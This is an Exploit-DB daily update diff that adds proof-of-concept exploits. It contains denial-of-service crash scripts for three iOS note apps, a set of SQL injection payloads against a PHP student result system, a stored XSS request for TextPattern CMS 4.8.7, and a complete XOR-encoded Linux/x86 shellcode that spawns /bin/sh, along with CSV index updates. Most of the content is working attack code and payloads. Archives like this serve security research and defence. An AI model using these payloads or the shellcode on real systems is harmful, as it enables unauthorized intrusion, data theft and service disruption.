DB: 2021-06-11

6 changes to exploits/shellcodes

Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
n+otes 1.6.2 - Denial of Service (PoC)

memono Notepad Version 4.2 - Denial of Service (PoC)
Student Result Management System 1.0 - 'class' SQL Injection
TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)

Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)

exploits/ios/dos/49978.py

@@ -0,0 +1,35 @@
+# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
+# Date: 06-07-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608
+# Version: 3.0.6
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/ios/dos/49979.py

@@ -0,0 +1,35 @@
+# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
+# Date: 06-09-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
+# Version: 1.6.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/ios/local/49977.py

@@ -0,0 +1,35 @@
+# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
+# Date: 06-09-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
+# Version: 4.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/php/webapps/49974.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection
+# Date: 09.09.2020
+# Exploit Author: Riadh Benlamine (rbn0x00)
+# Vendor Homepage : https://projectworlds.in
+# Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
+# Version: 1.0
+# Category: Webapps
+# Tested on: Apache2+MariaDB latest version
+# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.
+
+The vulnerable parameter uri: /srms/student.php?class=<injection point>
+
+exploit:
+
+    Parameter: class (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: class=-6346' OR 3657=3657#&rn=1
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1
+
+    Type: UNION query
+    Title: MySQL UNION query (random number) - 7 columns
+    Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1

exploits/php/webapps/49975.txt

@@ -0,0 +1,186 @@
+# Exploit Title: TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)
+# Date: 2021/09/06
+# Exploit Author: Mert Daş merterpreter@gmail.com
+# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
+# Software web: https://textpattern.com/
+# Tested on: Server: Xampp
+
+TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TextPattern 4.8.7 is vulnerable; other versions may also be affected. 
+
+Header
+
+-POST /textpattern/textpattern/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------1356274838636633083297009973
+Content-Length: 4574
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/textpattern/textpattern/index.php?event=article&ID=2%27
+Cookie: txp_login=admin%2C4c96cd31447df40aa2ceea6e052132b6; txp_login_public=895102db7badmin; language=en-gb; currency=USD; PHPSESSID=280d77vpc9brntkqclej5her85
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="ID"
+
+2
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="event"
+
+article
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="step"
+
+edit
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="sPosted"
+
+1623260284
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="sLastMod"
+
+1623260295
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="AuthorID"
+
+admin
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="LastModID"
+
+admin
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Title"
+
+"><img src=1 onerror=alert(1)>
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="textile_body"
+
+1
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Body"
+
+"><img src=1 onerror=alert(1)>
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="textile_excerpt"
+
+1
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Excerpt"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Status"
+
+4
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Section"
+
+articles
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="override_form"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="year"
+
+2021
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="month"
+
+06
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="day"
+
+09
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="hour"
+
+19
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="minute"
+
+38
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="second"
+
+04
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_year"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_month"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_day"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_hour"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_minute"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="exp_second"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="sExpires"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Category1"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Category2"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="url_title"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Keywords"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="Image"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="custom_1"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="custom_2"
+
+
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="save"
+
+Save
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="app_mode"
+
+async
+-----------------------------1356274838636633083297009973
+Content-Disposition: form-data; name="_txp_token"
+
+346eeab2db04acf953d13529f6be3a74
+-----------------------------1356274838636633083297009973--

files_exploits.csv

@@ -6796,6 +6796,8 @@ id,file,description,date,author,type,platform,port
 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios,
 49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
+49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
+49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11355,6 +11357,7 @@ id,file,description,date,author,type,platform,port
 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
+49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44129,3 +44132,5 @@ id,file,description,date,author,type,platform,port
 49971,exploits/php/webapps/49971.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2021-06-09,"Mert Daş",webapps,php,
 49972,exploits/php/webapps/49972.txt,"WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)",2021-06-09,"Mesut Cetin",webapps,php,
 49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php,
+49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php,
+49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,

files_shellcodes.csv

@@ -1037,3 +1037,4 @@ id,file,description,date,author,type,platform
 49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
 49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
 49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",2021-05-10,"Artur Szymczak",shellcode,linux_x86
+49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86

shellcodes/linux_x86/49976.c

@@ -0,0 +1,74 @@
+# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
+# Date: 09/06/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/*** 
+	shellcode with XOR decoder stub and fstenv MMX FPU 
+	spawning a /bin/sh shell
+
+	uses the fstenv GetPC technique to get the memory address dynamically
+	(alternative to jmp-call-pop) 
+
+	Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
+	./mmx-xor-decoder_eip
+	Shellcode Length: 70
+	# id
+	uid=0(root) gid=0(root) groups=0(root)
+	# ps -p $$
+	  PID TTY          TIME CMD
+	24045 pts/4    00:00:00 sh
+	
+	*** Created by d7x 
+		https://d7x.promiselabs.net 
+		https://www.promiselabs.net ***
+***/
+
+/*** 
+; shellcode assembly 
+
+global _start
+
+section .text
+_start:
+	fldz
+	fstenv [esp-0xc]
+	pop edi 	; put eip into edi
+	add edi, 37 	; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)
+
+	lea esi, [edi + 8]
+	xor ecx, ecx
+	mov cl, 4
+
+decode:
+	movq mm0, qword [edi]
+	movq mm1, qword [esi]
+	pxor mm0, mm1
+	movq qword [esi], mm0
+	add esi, 0x8
+	loop decode
+
+	jmp short EncodedShellcode
+
+shellcode:
+
+	decoder_value:	  db	0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d 
+	EncodedShellcode: db	0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d	
+
+***/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
+
+void main(void)
+{
+	printf("Shellcode Length: %d\n", strlen(shellcode));
+
+	int(*ret)() = (int(*)())shellcode;
+
+	ret();
+
+}